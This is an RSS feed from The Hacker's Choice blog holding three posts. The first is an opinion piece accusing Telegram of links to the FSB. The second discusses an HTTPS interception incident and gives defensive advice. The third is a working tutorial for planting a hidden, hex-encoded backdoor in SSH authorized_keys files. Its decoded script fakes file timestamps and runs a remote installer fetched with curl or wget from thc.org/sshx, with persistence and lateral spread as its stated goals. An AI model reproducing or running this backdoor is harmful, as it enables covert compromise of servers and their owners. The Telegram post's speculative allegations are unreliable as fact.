<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:hashnode="https://hashnode.com/rss"><channel><title><![CDATA[The Hacker's Choice]]></title><description><![CDATA[The Hacker's Choice]]></description><link>https://blog.thc.org</link><generator>RSS for Node</generator><lastBuildDate>Mon, 14 Oct 2024 23:10:42 GMT</lastBuildDate><atom:link href="https://blog.thc.org/rss.xml" rel="self" type="application/rss+xml"/><language><![CDATA[en]]></language><ttl>60</ttl><atom:link rel="next" href="https://blog.thc.org/rss.xml?page=2"/><atom:link rel="previous" href="https://blog.thc.org/rss.xml"/><item><title><![CDATA[Keep Pavel Durov LOCKED UP]]></title><description><![CDATA[Pavel was not arrested because he criticised Macron. He was arrested because he (allegedly) facilitates a wide range of crimes, including drug trafficking and ransomware groups.
He should have also been arrested for LYING to the community and for his...]]></description><link>https://blog.thc.org/keep-pavel-durov-locked-up</link><guid isPermaLink="true">https://blog.thc.org/keep-pavel-durov-locked-up</guid><category><![CDATA[#freedurov]]></category><category><![CDATA[telegram]]></category><dc:creator><![CDATA[root]]></dc:creator><pubDate>Mon, 26 Aug 2024 11:28:17 GMT</pubDate><content:encoded>&lt;![CDATA[&lt;p&gt;Pavel was not arrested because he criticised Macron. He was arrested because he (allegedly) facilitates a wide range of crimes, including drug trafficking and ransomware groups.&lt;/p&gt;&lt;p&gt;He should have also been arrested for LYING to the community and for his connection to the Kremlin.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;Anyone who is wilfully and knowingly LYING to the citizens about security should be locked up. #NoSnakeOil&lt;/strong&gt;&lt;/p&gt;&lt;ol&gt;&lt;li&gt;&lt;p&gt;&lt;a target=&quot;_blank&quot; href=&quot;https://blog.cryptographyengineering.com/2024/08/25/telegram-is-not-really-an-encrypted-messaging-app/&quot;&gt;Telegram is NOT encrypted&lt;/a&gt;. All your chat history is stored on TG&apos;s servers. IN CLEAR. FOREVER (see below).&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Telegram is a shady company (see below).&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;My gut says Telegram is an FSB operation.&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;h3 id=&quot;heading-i-dont-trust-telegram-lets-talk-about-my-feelings&quot;&gt;I don&apos;t trust Telegram. Let&apos;s talk about my feelings:&lt;/h3&gt;&lt;p&gt;In 2022, we took a look at &lt;a target=&quot;_blank&quot; href=&quot;https://core.telegram.org/&quot;&gt;Telegram&apos;s API&lt;/a&gt;. There is an undocumented API that allows an attacker (or the FSB) to DOWNLOAD any GROUP CHAT (where a bot is present). The attacker (or FSB) does not need to be in the group chat and does not need to own the BOT. 
Moreover, the API smells like &quot;lawful interception&quot; all over the place.&lt;/p&gt;&lt;ol&gt;&lt;li&gt;&lt;p&gt;This is possible even if the BOT is configured to have &quot;&lt;strong&gt;NO&lt;/strong&gt; access to messages&quot;.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Telegram&apos;s Disappearing Messages / Auto-Delete is a marketing farce. We exfiltrated ALL messages. Years and years of messages.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;All usernames, meta-data, media, voice recordings, join-messages...it&apos;s all there and nicely curated as HTML.&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;Example:&lt;/p&gt;&lt;p&gt;&lt;img src=&quot;https://cdn.hashnode.com/res/hashnode/image/upload/v1724667295433/8e8ea174-eabb-4112-b711-a32511013c47.png&quot; alt class=&quot;image--center mx-auto&quot; /&gt;&lt;/p&gt;&lt;p&gt;TG developed a fancy-looking data exfiltration API? With all the bells and whistles? Nicely curated output - and then did not document it? FOR WHOM? Smells fishy to me.&lt;/p&gt;&lt;p&gt;NOTE: The attacker does not need to OWN the BOT. The attacker does not need to be inside the group chat either. The EXFILTRATION is possible without the BOT&apos;s owner knowing.&lt;/p&gt;&lt;p&gt;&lt;em&gt;(Above example: THC did not own the BOT. THC was not in the group chat either. THC is not affiliated with the group. Yet, THC exfiltrated the entire chat history, using a series of undocumented API requests and cURL. The concern here is that such an exfil-API exists. Not how we exploited it. The image above is just from an innocent group chat of some random people....)&lt;/em&gt;&lt;/p&gt;&lt;h3 id=&quot;heading-what-else-smells-fishy&quot;&gt;What else smells fishy&lt;/h3&gt;&lt;ol&gt;&lt;li&gt;&lt;p&gt;Russia banned Signal and designated WhatsApp (Meta) as an &quot;extremist organisation&quot;. Russians flock to Telegram instead - a NON-encrypted messaging App that has a government-style undocumented Data Exfiltration API. 
Go figure.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;There was &quot;fake news&quot; that TG got banned in Russia. That&apos;s not true. Instead, third parties were &quot;temporarily&quot; banned for using TG&apos;s API. &lt;strong&gt;All users (in Russia) were using TG just fine. No ban. No restrictions.&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Pavel claims he left Russia because of his conflict with the Russian State. I think, in time, we will learn that Pavel left Russia so that he is in a better negotiation position with the FSB (he is harder to control while living abroad and less likely to commit &quot;&lt;a target=&quot;_blank&quot; href=&quot;https://en.wikipedia.org/wiki/Suspicious_deaths_of_notable_Russians_(2022%E2%80%932024)&quot;&gt;window suicides&lt;/a&gt;&quot;).&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;OSINT of Aeroflot data shows that &lt;a target=&quot;_blank&quot; href=&quot;https://theins.press/en/news/274165&quot;&gt;Pavel traveled to Russia 50&lt;/a&gt; times between 2015 and 2021 (no leaks available after 2021). That&apos;s almost ONCE EVERY MONTH. Why does he claim he &apos;lives in Exile&apos;?&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Where are the white-papers of their engineers? Why don&apos;t we see them more often in public? Like we see Moxie Marlinspike, Meredith Whittaker, Phil Zimmermann, ....&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Why are TG&apos;s engineers missing at every &lt;a target=&quot;_blank&quot; href=&quot;https://en.wikipedia.org/wiki/Internet_Engineering_Task_Force&quot;&gt;IETF meeting&lt;/a&gt; where strong encryption and privacy are shaped?&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Why is TG not open about their encryption? Why don&apos;t they allow peer-review? 
Or at least partly open it for public scrutiny?&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Pavel applauded &lt;a target=&quot;_blank&quot; href=&quot;https://www.theguardian.com/technology/article/2024/may/18/npr-elon-musk-signal&quot;&gt;a smear campaign targeting SIGNAL&lt;/a&gt; - claiming that Signal is &apos;in bed with the government&apos;. &lt;strong&gt;Bullshit&lt;/strong&gt;. We have known the people who work at Signal since we were kids. They have earned our trust - they have fought relentlessly to make encryption available to the masses - and fought relentlessly in many other arenas to help people escape authoritarian reach. (Russia bans Signal because it cannot be intercepted🖕🖕🖕. TG gets promoted instead. Go figure.)&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;WhatsApp reported &lt;a target=&quot;_blank&quot; href=&quot;https://www.bbc.co.uk/news/articles/cy54905nv0go&quot;&gt;1.5 MILLION cases to the NCMEC&lt;/a&gt; (Centre for Missing and Exploited Children). TG reported...a staggering...0 (ZERO) cases. TG refused to join ANY international or non-gov organisation or charity to stop the exploitation and abuse of children. NOT ONE.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;In June 2020, Putin praised TG as an example of &quot;&lt;a target=&quot;_blank&quot; href=&quot;https://kyivindependent.com/yaroslav-azhnyuk-why-doesnt-ukraine-restrict-use-of-the-russian-telegram-app/&quot;&gt;constructive cooperation&lt;/a&gt;&quot;. Meanwhile, Russian anti-war bloggers on Telegram are disappearing like flies.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;On 20 August 2024, Pavel traveled to &lt;a target=&quot;_blank&quot; href=&quot;https://theins.press/en/news/274165&quot;&gt;Azerbaijan&lt;/a&gt; to &lt;a target=&quot;_blank&quot; href=&quot;https://turan.az/en/politics/putin-refused-to-meet-with-pavel-durov-in-baku-783760&quot;&gt;meet Putin&lt;/a&gt;. 
Go figure.&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;hr /&gt;&lt;p&gt;Telegram wants to be a &quot;Secure Messaging App&quot; and &quot;fight repressive governments&quot;? Here are my tips:&lt;/p&gt;&lt;ol&gt;&lt;li&gt;&lt;p&gt;Implement p2p encryption by default.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Open your source. Stop hiding your encryption. It&apos;s not secure unless it&apos;s peer-reviewed. What do you have to hide?&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Your Data-Exfiltration API smells SORM/FSB compliant. DISABLE IT.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;TG is the C2 of choice for (mostly) Russian ransomware groups. Be better at moderating it.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Be truthful that you store all messages, regardless of &quot;auto delete&quot; settings, forever on your servers. &lt;strong&gt;STOP LYING TO THE USER&lt;/strong&gt;.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Make it obvious to non-tech users that TG is NOT secure. Not secure by default. That you keep and record every message ever sent - even if deleted by the user.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Stop this shady hiding. Be in the open. Show us who you are. Meet us at conferences. Come to the IETF. Show us what you&apos;ve got: your skill-set beyond data-mining, data-retention and data-exfiltration.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Disclose where your money comes from. Be open about your business plan. 
Show your accounts, beneficiaries, corporate structure and let&apos;s shine a light into every director&apos;s past.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Be more like &lt;a target=&quot;_blank&quot; href=&quot;https://signal.org/&quot;&gt;SIGNAL&lt;/a&gt; or the &lt;a target=&quot;_blank&quot; href=&quot;https://www.eff.org/&quot;&gt;EFF&lt;/a&gt;.&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;hr /&gt;&lt;p&gt;Other:&lt;/p&gt;&lt;ol&gt;&lt;li&gt;&lt;p&gt;&lt;a target=&quot;_blank&quot; href=&quot;https://www.pravda.com.ua/eng/articles/2023/10/1/7422200/&quot;&gt;Who is funding Telegram&lt;/a&gt;?&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;a target=&quot;_blank&quot; href=&quot;https://www.wired.com/story/the-kremlin-has-entered-the-chat/&quot;&gt;The Kremlin has entered Telegram&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;a target=&quot;_blank&quot; href=&quot;https://www.kelacyber.com/durov-telegram-ceo-under-arrest/&quot;&gt;Telegram and the criminal connection&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;a target=&quot;_blank&quot; href=&quot;https://www.bbc.com/news/articles/cdey4prn3e1o&quot;&gt;BBC: Telegram is a dark web&lt;/a&gt;&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;Note: Is it a bit harsh that we think Pavel should be locked up? Yes. Thanks for not just reading the headline. TG needs to fix their approach to Security, Privacy and Freedom. Imagine a car manufacturer saying &quot;&lt;em&gt;That airbag works&lt;/em&gt;&quot; when it ain&apos;t. When it never worked as promised. Get our drift here? TG is not secure. TG logs every message you send - forever, regardless of whether you delete the message or not. TG has some work to do.&lt;/p&gt;&lt;p&gt;Note: THC has a public channel on Telegram. Yes. We don&apos;t seek privacy for our &lt;strong&gt;public&lt;/strong&gt; channel. You (or your favourite government) can shine a light up our arses and see that we ain&apos;t criminals. 
It is a &lt;strong&gt;PUBLIC&lt;/strong&gt; channel.&lt;/p&gt;&lt;p&gt;For all else, find us on SIGNAL.&lt;/p&gt;&lt;hr /&gt;&lt;h2 id=&quot;heading-addendum&quot;&gt;Addendum&lt;/h2&gt;&lt;ol&gt;&lt;li&gt;&lt;p&gt;IMHO, the French reasons for the arrest are (all?) bogus (for now). It feels like they arrested him for nonsense so that they can &apos;talk&apos; and hope to find out more about the (alleged) Pavel/Kremlin link or if Pavel benefits from the ransomware groups/Cartels either directly (TG&apos;s premium feature) or indirectly via bribes and benefits-in-kind (?). This does not set a good precedent.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;I will release the API calls within 4-6 weeks (PM me if I forget). Let&apos;s give the TG users some time to disable their bots. Meanwhile, one researcher has contacted me privately, saying that he found the same API and used it to exfil TG data in the past. I&apos;m not sure who was first or whether it matters.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;The attacker needs to know the BOT-Token (but does not need to be the owner of the BOT and does not need to have had any interaction with the BOT). We wanted to show that TG stores all messages in clear. TG of course has all BOT Tokens (and they don&apos;t need to use the TOKEN to access all messages in clear). We demonstrated that this is not just messages to and from the BOT but all messages of any group chat the BOT is in, even if the BOT is configured with &quot;has_access_to_messages: false&quot;. We needed the BOT token to demonstrate this. TG does not need the BOT Token to access all messages in clear.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;We contacted TG. 
Maybe they allow us to be part of the solution.&lt;/p&gt;&lt;p&gt;&lt;img src=&quot;https://cdn.hashnode.com/res/hashnode/image/upload/v1724750480065/93ed6eee-e30d-48f5-8135-e4f4edfe55a3.png&quot; alt class=&quot;image--center mx-auto&quot; /&gt;&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;]]&gt;</content:encoded><hashnode:coverImage>https://cdn.hashnode.com/res/hashnode/image/upload/v1724671245499/7642ef6e-0553-4127-bb57-d69be0b08b86.jpeg</hashnode:coverImage></item><item><title><![CDATA[HTTPS Interception by a state actor in Germany]]></title><description><![CDATA[Some comments regarding the recently discovered Interception of HTTPS/TLS/SSL traffic by a state actor in Germany.
Ten years ago, in 2013, the IETF #88 (which is the standardization body of the Internet) declared that the Internet surveillance progra...]]></description><link>https://blog.thc.org/https-interception-by-a-state-actor-in-germany</link><guid isPermaLink="true">https://blog.thc.org/https-interception-by-a-state-actor-in-germany</guid><category><![CDATA[TLS]]></category><category><![CDATA[hacking]]></category><category><![CDATA[Security]]></category><category><![CDATA[privacy]]></category><dc:creator><![CDATA[root]]></dc:creator><pubDate>Sat, 21 Oct 2023 06:55:26 GMT</pubDate><content:encoded>&lt;![CDATA[&lt;p&gt;Some comments regarding the recently discovered &lt;a target=&quot;_blank&quot; href=&quot;https://notes.valdikss.org.ru/jabber.ru-mitm/&quot;&gt;Interception of HTTPS/TLS/SSL traffic&lt;/a&gt; by a state actor in Germany.&lt;/p&gt;&lt;p&gt;Ten years ago, in 2013, the IETF (the standardization body of the Internet) declared at IETF #88 that the Internet surveillance program by the NSA (Snowden leak) constitutes an &quot;&lt;strong&gt;Attack against the Internet and the IETF&lt;/strong&gt;&quot;. Ten years later, the Internet is still under attack. HTTPS is not safe. Whether you are browsing the Internet, doing online banking, forming a political opposition, or working as a journalist, you &lt;strong&gt;are not safe&lt;/strong&gt;.&lt;/p&gt;&lt;ol&gt;&lt;li&gt;&lt;p&gt;The interception happened at layer 7 of the ISO/OSI model. This is odd (for a state actor). Such an attack can be detected by observing the changing TCP counters (SEQ/ACK) and the TTL. The intercept should have been done at layer 3 and without changing the IP/TCP/TTL counters ...or the size of the packets.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;The attacker made several mistakes. 
The most noticeable is the expired certificate, but there were also a bad CommonName (CN), a TTL mess-up, a network outage, and the failure to use a fully transparent proxy ...&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;The attacker messed up the ARP table.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;The attacker did not steal the original certificate/key from the server.&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;&lt;strong&gt;The interception does not have the typical hallmarks of a professional state actor.&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;Recommendations for server admins and app developers:&lt;/p&gt;&lt;ol&gt;&lt;li&gt;&lt;p&gt;Do not use a public Certification Authority. If you do, then the app/client should not load the entire CA bundle. It should only load the one CA that was used to sign the server&apos;s certificate.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Make use of &lt;a target=&quot;_blank&quot; href=&quot;https://en.wikipedia.org/wiki/Certificate_Transparency&quot;&gt;Certificate Transparency&lt;/a&gt; (CT) and get &lt;a target=&quot;_blank&quot; href=&quot;https://sslmate.com/certspotter/&quot;&gt;notified&lt;/a&gt; when your issuer or another Certification Authority (CA) issues a new certificate for your domain name. Most modern browsers (but not all) reject any certificate that is not logged by CT. Most (all?) other TLS applications will accept unlogged certificates.&lt;/p&gt;&lt;p&gt;Other cloud services offer to regularly check your TLS services for a changing certificate. The attacker could easily decide to &apos;not intercept&apos; the traffic from those crawlers/spiders.&lt;/p&gt;&lt;p&gt;Ultimately, it should be the client software that yells a warning when the server&apos;s certificate changes.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Certification Authority Authorization (CAA) is a voluntary option and it is not enforced by the browser or client. 
&lt;strong&gt;This will not happen anytime soon.&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Make the server&apos;s certificate sticky. The client should yell a warning when the server&apos;s certificate changes, even &lt;strong&gt;if the new certificate is valid&lt;/strong&gt;, and &lt;em&gt;especially&lt;/em&gt; if the old certificate is not due for renewal. &lt;em&gt;Is there a browser plugin that does this?&lt;/em&gt; &lt;strong&gt;THIS CAN HAPPEN SOON.&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Watch the TCP/IP/TTL counters. An incoming TCP connection with TTL &amp;gt;= 62 means it&apos;s not a real user but an attacker/MitM connecting to your server 🤗 (&lt;strong&gt;we pity the state actor for messing this up&lt;/strong&gt;).&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Store your server&apos;s key on an encrypted volume that does not auto-mount, to which only YOU have the password (&lt;em&gt;not&lt;/em&gt; AWS encrypted EBS, to which AWS holds the password). It&apos;s a pain because the server won&apos;t restart automatically after a reboot: it needs an admin to enter the password - but that&apos;s the world we are living in. Get used to it.&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;There is a wider problem: &lt;strong&gt;attacks always get better&lt;/strong&gt;. Here are two problems to ponder:&lt;/p&gt;&lt;ol&gt;&lt;li&gt;&lt;p&gt;State actors have access to the underlying VPS storage device (volume). They don&apos;t need to create a &apos;new&apos; certificate using LetsEncrypt. Instead, they can steal the existing one from the server without the server noticing it, and without having to log in to the VPS server. &lt;em&gt;Why didn&apos;t they?&lt;/em&gt; &lt;strong&gt;&lt;mark&gt;THAT IS THE ATTACKER&apos;S OBVIOUS NEXT MOVE.&lt;/mark&gt;&lt;/strong&gt;&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Cloud Service Providers use EDGE servers (Cloudflare and all others). 
They do &apos;Interception&apos; as a feature: When you configure a cloud server with &apos;edge&apos; support then your server&apos;s key is loaded to the Cloud&apos;s &lt;em&gt;edge&lt;/em&gt;. All traffic is then decrypted at the edge (aka the &quot;&lt;em&gt;TLS border gateway&lt;/em&gt;&quot;). &lt;strong&gt;E2EE is dead&lt;/strong&gt;. It&apos;s more like &lt;em&gt;&apos;encrypted to the first EDGE and then all is cleartext (and readable by the Edge-Provider and state actors) until the traffic reaches your server&apos;&lt;/em&gt;.&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;This type of attack (when the server&apos;s private key is stolen) is hard to defend against, but easily performed by an attacker. Two ways to make this attack harder:&lt;/p&gt;&lt;ol&gt;&lt;li&gt;&lt;p&gt;Enforce client authentication with client keys (like SSH does). Don&apos;t use passwords. Ever.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Compare the ECDH &lt;em&gt;shared-secret&lt;/em&gt; that Alice and Bob negotiated during the key exchange (KEX). When under MitM attack, this shared-secret will be different for Alice and Bob (when normally it would not): Malice, sucks to be her, cannot guess the public part of the ECDH pair. She needs to generate her own ECDH pair, one for the Alice-side, and another one for the Bob-side of the intercepted connection. Malice will intercept with the two different shared-secrets. Alice and Bob will end up with different shared-secrets when under attack.&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;Other: &lt;a target=&quot;_blank&quot; href=&quot;https://www.devever.net/~hl/xmpp-incident&quot;&gt;https://www.devever.net/~hl/xmpp-incident&lt;/a&gt;&lt;/p&gt;&lt;p&gt;Like talking about cryptography and security? We get a hard-on every time. 
Join us on Telegram: &lt;a target=&quot;_blank&quot; href=&quot;https://t.me/thcorg&quot;&gt;https://t.me/thcorg&lt;/a&gt;.&lt;/p&gt;]]&gt;</content:encoded><hashnode:coverImage>https://cdn.hashnode.com/res/hashnode/image/upload/v1697870813999/c480675b-87ff-429e-a785-10114bde69e8.jpeg</hashnode:coverImage></item><item><title><![CDATA[Infecting SSH Public Keys with backdoors]]></title><description><![CDATA[In this article, you will learn how to add a backdoor to the SSH Public Key. The backdoor will execute whenever the user logs in. 
The backdoor hides as an unreadable long hex-string inside ~/.ssh/authorized_keys or ~/.ssh/id_*.pub.
The source is avai...]]></description><link>https://blog.thc.org/infecting-ssh-public-keys-with-backdoors</link><guid isPermaLink="true">https://blog.thc.org/infecting-ssh-public-keys-with-backdoors</guid><category><![CDATA[Security]]></category><category><![CDATA[hacking]]></category><category><![CDATA[ssh]]></category><dc:creator><![CDATA[root]]></dc:creator><pubDate>Wed, 24 May 2023 10:52:25 GMT</pubDate><content:encoded>&lt;![CDATA[&lt;p&gt;In this article, you will learn how to add a backdoor to the SSH Public Key. The backdoor will execute whenever the user logs in. The backdoor hides as an unreadable long hex-string inside &lt;code&gt;~/.ssh/authorized_keys&lt;/code&gt; or &lt;code&gt;~/.ssh/id_*.pub.&lt;/code&gt;&lt;/p&gt;&lt;p&gt;The source is available from &lt;a target=&quot;_blank&quot; href=&quot;https://github.com/hackerschoice/ssh-key-backdoor&quot;&gt;GitHub&lt;/a&gt;.&lt;/p&gt;&lt;h3 id=&quot;heading-tldr&quot;&gt;TL;DR&lt;/h3&gt;&lt;p&gt;Simply prepend any SSH Public Key with the following &lt;strong&gt;backdoor-string&lt;/strong&gt; - up until, but not including, the &lt;code&gt;ssh-ed25519 AAAAC3Nzblah...&lt;/code&gt;):&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;lang-typescript&quot;&gt;no-user-rc,no-X11-forwarding,command=&lt;span class=&quot;hljs-string&quot;&gt;&quot;`###---POWERSHELL---`;eval $(echo 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|xxd -r -ps);&quot;&lt;/span&gt; ssh-ed25519 AAAAC3Nzblah....&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Root is not needed.&lt;/p&gt;&lt;h3 id=&quot;heading-whats-the-purpose&quot;&gt;What&apos;s the purpose&lt;/h3&gt;&lt;ol&gt;&lt;li&gt;&lt;p&gt;For the lulz.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Re-starts your backdoor after the server reboots (similar to infecting &lt;code&gt;crontab&lt;/code&gt; or &lt;code&gt;~/.bashrc&lt;/code&gt;).&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Spread laterally: Admins are known to copy their SSH Public Keys to new servers. 
Own them.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Cloud deployments often copy the Admin&apos;s Public Key to new instances - and now they copy your backdoor inside as well.&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;h3 id=&quot;heading-the-nitty-gritty&quot;&gt;The nitty-gritty&lt;/h3&gt;&lt;p&gt;OpenSSH has an &lt;a target=&quot;_blank&quot; href=&quot;https://man.openbsd.org/OpenBSD-current/man8/sshd.8#AUTHORIZED_KEYS_FILE_FORMAT&quot;&gt;unsung feature&lt;/a&gt; to execute a command (instead of a Shell) when a user successfully logs in. This feature (for example) is used by AWS to tell the customer not to log in as root:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;lang-typescript&quot;&gt;no-port-forwarding,no-agent-forwarding,command=&lt;span class=&quot;hljs-string&quot;&gt;&quot;echo &apos;Please login as the user \&quot;ubuntu\&quot; rather than the user \&quot;root\&quot;.&apos;;echo;sleep 10;exit 142&quot;&lt;/span&gt; ssh-ed25519 AAAA...&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;The trick is to use OpenSSH&apos;s &lt;code&gt;command=&lt;/code&gt; feature and silently start our backdoor &lt;strong&gt;and&lt;/strong&gt; afterwards execute the user&apos;s shell (with PTY) without the user noticing it.&lt;/p&gt;&lt;h3 id=&quot;heading-the-details&quot;&gt;The Details&lt;/h3&gt;&lt;p&gt;Let&apos;s dissect the &lt;strong&gt;backdoor-string&lt;/strong&gt;: The &lt;code&gt;no-user-rc,no-X11-forwarding&lt;/code&gt; is a ruse to throw off any prying eyes. It can be omitted.&lt;/p&gt;&lt;p&gt;The &lt;code&gt;command=&lt;/code&gt; string is where the real magic happens. 
Here is a shorter version of a simplified &lt;strong&gt;backdoor-string&lt;/strong&gt;:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;lang-typescript&quot;&gt;command=&lt;span class=&quot;hljs-string&quot;&gt;&quot;`###---POWERSHELL---`;eval $(echo 6563686f2048656c6c6f204261636b646f6f72|xxd -r -ps)&quot;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;OpenSSH executes the entire string between the two quotes &lt;code&gt;&quot;&lt;/code&gt;...&lt;code&gt;&quot;&lt;/code&gt;.&lt;/p&gt;&lt;p&gt;The &lt;code&gt;`###---POWERSHELL---`;&lt;/code&gt; is a ruse as well. It does nothing.&lt;/p&gt;&lt;p&gt;The next command, &lt;code&gt;eval&lt;/code&gt;, executes the commands that are hidden inside the encoded hex string.&lt;/p&gt;&lt;p&gt;Let&apos;s decode the hex string to reveal the actual commands that are being executed:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;lang-bash&quot;&gt;$ &lt;span class=&quot;hljs-built_in&quot;&gt;echo&lt;/span&gt; 6563686f2048656c6c6f204261636b646f6f72 | xxd -r -ps&lt;span class=&quot;hljs-built_in&quot;&gt;echo&lt;/span&gt; Hello Backdoor&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;This simplified backdoor only prints &quot;Hello Backdoor&quot; on log-in and then terminates the SSH connection.&lt;/p&gt;&lt;p&gt;Our &lt;strong&gt;backdoor-string&lt;/strong&gt; is more complex and decoded here:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;lang-bash&quot;&gt;[[ $(&lt;span class=&quot;hljs-built_in&quot;&gt;stat&lt;/span&gt; -c%Y /bin/sh) != $(&lt;span class=&quot;hljs-built_in&quot;&gt;stat&lt;/span&gt; -c%Y .ssh) ]] &amp;amp;&amp;amp; {    touch -r /bin/sh .ssh    &lt;span class=&quot;hljs-built_in&quot;&gt;export&lt;/span&gt; KEY=&lt;span class=&quot;hljs-string&quot;&gt;&quot;&quot;&lt;/span&gt;    bash -c &lt;span class=&quot;hljs-string&quot;&gt;&quot;&lt;span class=&quot;hljs-subst&quot;&gt;$(curl -fsSL thc.org/sshx)&lt;/span&gt;&quot;&lt;/span&gt; || bash -c &lt;span class=&quot;hljs-string&quot;&gt;&quot;&lt;span class=&quot;hljs-subst&quot;&gt;$(wget 
--no-verbose -O- thc.org/sshx)&lt;/span&gt;&quot;&lt;/span&gt; || &lt;span class=&quot;hljs-built_in&quot;&gt;exit&lt;/span&gt; 0} &amp;gt;/dev/null 2&amp;gt;/dev/null &amp;amp;[[ -n &lt;span class=&quot;hljs-variable&quot;&gt;$SSH_ORIGINAL_COMMAND&lt;/span&gt; ]] &amp;amp;&amp;amp; &lt;span class=&quot;hljs-built_in&quot;&gt;exec&lt;/span&gt; &lt;span class=&quot;hljs-variable&quot;&gt;$SSH_ORIGINAL_COMMAND&lt;/span&gt;[[ -z &lt;span class=&quot;hljs-variable&quot;&gt;$SHELL&lt;/span&gt; ]] &amp;amp;&amp;amp; SHELL=/bin/bash[[ -f /run/motd.dynamic ]] &amp;amp;&amp;amp; cat /run/motd.dynamic[[ -f /etc/motd ]] &amp;amp;&amp;amp; cat /etc/motd&lt;span class=&quot;hljs-built_in&quot;&gt;exec&lt;/span&gt; -a -$(basename &lt;span class=&quot;hljs-variable&quot;&gt;$SHELL&lt;/span&gt;) &lt;span class=&quot;hljs-variable&quot;&gt;$SHELL&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Firstly it uses a canary to make sure that the backdoor is only started &lt;em&gt;once&lt;/em&gt; and not on every login: If &lt;code&gt;~/.ssh&lt;/code&gt; and &lt;code&gt;/bin/sh&lt;/code&gt; have the same date then assume that the backdoor is already installed. Otherwise set them to the same date and execute the backdoor thereafter.&lt;/p&gt;&lt;p&gt;The backdoor in this case is a backdoor-installer script pulled from &lt;a target=&quot;_blank&quot; href=&quot;http://thc.org/sshx&quot;&gt;thc.org/sshx&lt;/a&gt; and executed in memory. It starts as a background process to not slow down the user&apos;s log-in. 
